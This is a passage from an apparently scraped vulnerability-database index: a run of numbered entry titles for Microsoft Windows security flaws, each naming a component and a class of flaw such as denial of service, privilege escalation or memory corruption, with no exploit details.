Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded 